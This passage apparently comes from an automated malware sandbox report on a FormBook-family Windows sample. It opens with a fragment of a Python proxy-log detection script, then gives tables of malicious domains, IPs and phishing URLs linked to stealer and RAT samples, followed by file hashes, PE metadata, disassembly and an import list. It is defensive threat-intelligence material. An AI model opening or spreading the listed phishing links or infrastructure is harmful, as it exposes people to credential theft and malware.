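        fields = line.split()
        if len(fields) != 5:
            continue  # malformed line, skip rather than guess
        _ts, client, _method, url, _status = fields
        verdict = classify(url)
        if verdict != "none":
            hits.append((client, urlsplit(url).hostname, verdict))
    return hits


if __name__ == "__main__":
    for client, host, verdict in scan_proxy_log(PROXY_LOG):
        print(f"{verdict:5s} {client} -> {host}")
```

In practice the "known" verdict is what you alert on; "shape" hits are worth a look only when the same client also resolved a low-reputation domain or, as in this report, the traffic originated from an injected process.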
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.specialgift.asia.s.strikinglydns.com | MGQeZjDXc3.exe | malicious | FormBook | 18.176.133.53
www.specialgift.asia.s.strikinglydns.com | wavjjT3sEq.exe | malicious | FormBook | 35.156.117.131
www.specialgift.asia.s.strikinglydns.com | Order.exe | malicious | FormBook, PureLog Stealer | 35.156.117.131
www.specialgift.asia.s.strikinglydns.com | jeez.exe | malicious | FormBook | 35.156.117.131
www.ophthalmo.cloud | MGQeZjDXc3.exe | malicious | FormBook | 217.160.0.207
www.ophthalmo.cloud | s7Okni1gfE.exe | malicious | FormBook | 217.160.0.207
www.ophthalmo.cloud | jeez.exe | malicious | FormBook | 217.160.0.207
www.ophthalmo.cloud | sa7Bw41TUq.exe | malicious | FormBook | 217.160.0.207
www.ngmr.xyz | MGQeZjDXc3.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | s7Okni1gfE.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | Purchase_Order_pdf.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | rHSBCBank_Paymentswiftcpy.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | jeez.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | -pdf.bat.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | z4Shipping_document_pdf.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 54.67.87.110
zhs.zohosites.com | ek8LkB2Cgo.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | r6lOHDg9N9.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | Purchase_Order_pdf.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | jeez.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | PURCHASE ORDER.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | z4Shipping_document_pdf.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | PROFOMA INVOICE SHEET.exe | malicious | FormBook | 136.143.186.12
zhs.zohosites.com | x.exe | malicious | FormBook | 136.143.186.12
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02 US | ARMV4L.elf | malicious | Unknown | 54.171.230.55
AMAZON-02 US | wSoShbuXnJ.exe | malicious | FormBook | 3.252.97.86
AMAZON-02 US | BLv4mI7zzY.exe | malicious | FormBook | 13.228.81.39
AMAZON-02 US | 4.elf | malicious | Unknown | 18.131.143.241
AMAZON-02 US | ydJaT4b5N8.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 US | BalphRTkPS.exe | malicious | FormBook | 18.139.62.226
AMAZON-02 US | n2pGr8w21V.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 US | PGK60fNNCZ.exe | malicious | FormBook | 13.248.169.48
AMAZON-02 US | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | 76.223.54.146
AMAZON-02 US | zAg7xx1vKI.exe | malicious | FormBook | 13.248.169.48
ZOHO-AS US | https://zfrmz.com/3GiGYUP4BArW2NBgkPU3 | malicious | Unknown | 136.143.190.97
ZOHO-AS US | https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN | malicious | Unknown | 136.143.191.101
ZOHO-AS US | Fantazy.sh4.elf | malicious | Unknown | 165.173.254.209
ZOHO-AS US | https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26 | malicious | Unknown | 136.143.190.75
ZOHO-AS US | https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4 | malicious | Unknown | 136.143.190.75
ZOHO-AS US | https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D | malicious | Unknown | 136.143.190.89
ZOHO-AS US | https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGN | malicious | HTMLPhisher | 136.143.190.172
ZOHO-AS US | https://jkqbjwq.maxiite.com | malicious | HTMLPhisher | 204.141.42.148
ZOHO-AS US | https://url.us.m.mimecastprotect.com/s/hI-dC2kAwJT85krqxhnf2I5Wy1H?domain=sign.zoho.com | malicious | Unknown | 204.141.43.101
ZOHO-AS US | SH8ZyOWNi2.exe | malicious | CMSBrute | 204.141.43.44
NAMECHEAP-NET US | 5by4QM3v89.exe | malicious | FormBook | 199.192.23.123
NAMECHEAP-NET US | 5CTbduoXq4.exe | malicious | FormBook | 63.250.43.134
NAMECHEAP-NET US | https://services221.com/mm/ | malicious | HTMLPhisher | 198.54.116.108
NAMECHEAP-NET US | wWXR5js3k2.exe | malicious | FormBook | 63.250.43.134
NAMECHEAP-NET US | OVZizpEU7Q.exe | malicious | FormBook | 63.250.43.134
NAMECHEAP-NET US | QmBbqpEHu0.exe | malicious | FormBook | 199.193.6.134
NAMECHEAP-NET US | KcSzB2IpP5.exe | malicious | FormBook | 162.0.236.169
NAMECHEAP-NET US | DpTbBYeE7J.exe | malicious | AgentTesla, PureLog Stealer | 198.54.122.135
NAMECHEAP-NET US | 1162-201.exe | malicious | FormBook | 162.0.236.169
NAMECHEAP-NET US | https://delivery-pack.com/checkout/?add-to-cart=12 | malicious | Unknown | 63.250.43.146
CONTABO DE | 1SxKeB4u0c.exe | malicious | FormBook | 161.97.142.144
CONTABO DE | uG3I84bQEr.exe | malicious | FormBook | 161.97.142.144
CONTABO DE | 5CTbduoXq4.exe | malicious | FormBook | 161.97.142.144
CONTABO DE | 0Wu31IhwGO.exe | malicious | FormBook | 161.97.142.144
CONTABO DE | gKvjKMCUfq.exe | malicious | FormBook | 161.97.142.144
CONTABO DE | https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com | malicious | HTMLPhisher | 173.249.62.84
CONTABO DE | https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com | malicious | HTMLPhisher | 173.249.62.84
CONTABO DE | 4sfN3Gx1vO.exe | malicious | FormBook | 161.97.142.144
CONTABO DE | 82eqjqLrzE.exe | malicious | AsyncRAT | 144.91.79.54
CONTABO DE | DF2.exe | malicious | Unknown | 173.249.2.110
                                                                    No context
                                                                    No context
Process: C:\Windows\SysWOW64\clip.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209886597424439
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5: EFD26666EAE0E87B32082FF52F9F4C5E
SHA1: 603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256: 67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512: 28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W..... (the rest of the preview is non-printable bytes rendered as dots)
Process: C:\Users\user\Desktop\plZuPtZoTk.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.994474853297339
Encrypted: true
SSDEEP: 6144:LaJnmiN9IQghIOt39ziyBGTQEO2ET2CRSeKab+2d7Br3vG7Os/JRCHkz:LaNITLNzzghO2rCRdLK2Nl3vNGzhz
MD5: 0BC44F5335F34AF266C56C73E6EADA41
SHA1: 10DE8878ADF7AE6F517C27F0A3029BF591FF79D2
SHA-256: 9B72D101E16F22B548A9903C3C6646A9DE18602FE5B34324537831566C5B85C9
SHA-512: D4CFD338BEFF9216F2BA132C31052F15483CF0A5761BA2566861E175672DED0DDBD505FC05493108D61C04A4E4FC58C82D5CD39C1979996C8D8F30B85D83D51D
Malicious: false
Reputation: low
Preview: ...e.Q9EQ..:....s.BE..f1G...V7XQ9EQRFV353E2OBBFEWJN2ORVJV7.Q9E_M.X3.:...C..d."'Ao"$%1E9<.&0<(9G.Q .=7,f,9j.}.r;%2Rv\4OuRFV353EKNK.{%0.sR(.k*1.B...k2!.)..../%.\...rR(..#5_e1^.QRFV353Eb.BB.DVJ..^.VJV7XQ9E.RDW848E2.FBFEWJN2OR.^V7XA9EQ2BV35sE2_BBFGWJH2ORVJV7^Q9EQRFV3U7E2MBBFEWJL2..VJF7XA9EQRVV3%3E2OBBVEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7XQ9EQRFV353E2OBBFEWJN2ORVJV7X (the 28-character sequence Q9EQRFV353E2OBBFEWJN2ORVJV7X then repeats, with sporadic variations, for the rest of the preview)
                                                                    Process:C:\Users\user\Desktop\plZuPtZoTk.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287232
                                                                    Entropy (8bit):7.994474853297339
                                                                    Encrypted:true
                                                                    SSDEEP:6144:LaJnmiN9IQghIOt39ziyBGTQEO2ET2CRSeKab+2d7Br3vG7Os/JRCHkz:LaNITLNzzghO2rCRdLK2Nl3vNGzhz
                                                                    MD5:0BC44F5335F34AF266C56C73E6EADA41
                                                                    SHA1:10DE8878ADF7AE6F517C27F0A3029BF591FF79D2
                                                                    SHA-256:9B72D101E16F22B548A9903C3C6646A9DE18602FE5B34324537831566C5B85C9
                                                                    SHA-512:D4CFD338BEFF9216F2BA132C31052F15483CF0A5761BA2566861E175672DED0DDBD505FC05493108D61C04A4E4FC58C82D5CD39C1979996C8D8F30B85D83D51D
                                                                    Malicious:false
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.159394279736206
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:plZuPtZoTk.exe
                                                                    File size:1'272'832 bytes
                                                                    MD5:03473468fd10d42dd617a426dcffa92d
                                                                    SHA1:c1055cc7420cf9f54de46dc813920f34051e7131
                                                                    SHA256:5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28
                                                                    SHA512:c6fb7620696773e1729efd41b39cd7e87d87b3fce23a2beace4fe356d6daa461a8d2cd4a9cf65137b75c1607b6ec91fcf78684b27a766dfc884c637d71a96fba
                                                                    SSDEEP:24576:QqDEvCTbMWu7rQYlBQcBiT6rprG8aWFtXbag42s2Dpq2t4g5nM:QTvC/MTQYxsWR7aWDXs2s2D9D5n
                                                                    TLSH:A645CF027381D022FF9B92334F5AF6515BBC69260123E62F13981DB9BE705B1563E7A3
                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                    Icon Hash:aaf3e3e3938382a0
                                                                    Entrypoint:0x420577
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6764AAFD [Thu Dec 19 23:23:41 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                                    Instruction
                                                                    call 00007F56F547F983h
                                                                    jmp 00007F56F547F28Fh
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007F56F547F46Dh
                                                                    mov dword ptr [esi], 0049FDF0h
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                                    mov dword ptr [ecx], 0049FDF0h
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    push dword ptr [ebp+08h]
                                                                    mov esi, ecx
                                                                    call 00007F56F547F43Ah
                                                                    mov dword ptr [esi], 0049FE0Ch
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    and dword ptr [ecx+04h], 00000000h
                                                                    mov eax, ecx
                                                                    and dword ptr [ecx+08h], 00000000h
                                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                                    mov dword ptr [ecx], 0049FE0Ch
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    and dword ptr [eax], 00000000h
                                                                    and dword ptr [eax+04h], 00000000h
                                                                    push eax
                                                                    mov eax, dword ptr [ebp+08h]
                                                                    add eax, 04h
                                                                    push eax
                                                                    call 00007F56F548202Dh
                                                                    pop ecx
                                                                    pop ecx
                                                                    mov eax, esi
                                                                    pop esi
                                                                    pop ebp
                                                                    retn 0004h
                                                                    lea eax, dword ptr [ecx+04h]
                                                                    mov dword ptr [ecx], 0049FDD0h
                                                                    push eax
                                                                    call 00007F56F5482078h
                                                                    pop ecx
                                                                    ret
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push esi
                                                                    mov esi, ecx
                                                                    lea eax, dword ptr [esi+04h]
                                                                    mov dword ptr [esi], 0049FDD0h
                                                                    push eax
                                                                    call 00007F56F5482061h
                                                                    test byte ptr [ebp+08h], 00000001h
                                                                    pop ecx
                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x60114 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x135000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x60114 | 0x60200 | c6583115f752dfa38b46a5a8e36a4bc8 | False | 0.93156443026658 | data | 7.903182803750103 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x135000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x573db | data | | | 1.0003246217177526
RT_GROUP_ICON | 0x133b94 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x133c0c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x133c20 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x133c34 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x133c48 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x133d24 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
